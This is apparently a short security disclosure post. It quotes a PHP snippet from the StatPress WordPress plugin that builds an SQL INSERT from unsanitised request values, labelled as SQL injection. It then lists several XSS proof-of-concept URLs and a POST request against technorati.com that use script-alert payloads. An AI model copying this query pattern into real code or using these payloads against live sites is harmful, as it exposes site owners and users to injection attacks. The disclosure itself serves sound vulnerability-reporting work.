StatPress/StatPress Reloaded – SQL Injections

iriStatAppend()

    // URL (requested)
    $urlRequested = iri_StatPress_URL();
    …
    $referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : '');
    …
    $insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " .
        "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','"

Technorati XSS

If anyone is interested, Technorati is full of bugs like this.

http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.technorati.com/404please%27);alert(1);//
http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
[POST] http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser